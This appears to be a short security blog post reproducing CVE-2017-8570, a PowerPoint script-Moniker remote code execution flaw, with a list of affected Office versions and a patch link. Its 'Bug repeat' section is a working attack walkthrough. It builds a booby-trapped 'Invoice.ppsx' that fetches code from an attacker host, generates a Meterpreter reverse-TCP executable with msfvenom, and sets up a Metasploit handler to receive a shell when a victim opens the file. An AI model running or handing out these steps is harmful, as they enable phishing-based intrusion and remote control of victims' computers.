首页 » NetworkSec » AWD » 正文

CVE-2017-8570 repeat

0x01.Overview

In July 2017, Microsoft fixed multiple Microsoft Office vulnerabilities,including the cve-2017-8570 vulnerability which is a logical vulnerability,it is easy to use and simple,and the vulnerability is a remote code execution vulnerability for Microsoft Office.
The reason for this is that Microsoft PowerPoint will initialize the “script” Moniker object when it is executed, while the object will be activated during the presentation of the PowerPoint animation, and the SCT (script Component file) will be executed. An attack can trick a user into running a powerpoint file containing the vulnerability that results in obtaining the same executive permissions as the current logon user.

0x02 Influence

Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

0x03 Bug repeat

Step1:
python cve-2017-8570_toolkit.py  -M gen -w Invoice.ppsx -u http://attackerip/logo.doc
Step2:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=4444 -f exe > /tmp/shell.exe
Step3:
python cve-2017-8570_toolkit.py -M exp -e http://attackerip/shell.exe -l /tmp/shell.exe
Step4:
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp    //设置Payload
set LHOST attackerip
run
Step5
Double click Invoice.ppsx in victim that you can get a meterpreter.

0x04 Repair

Get the patch from MS : https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570

0x05 Reference

http://www.ichunqiu.com
 

Comment

please input captcha *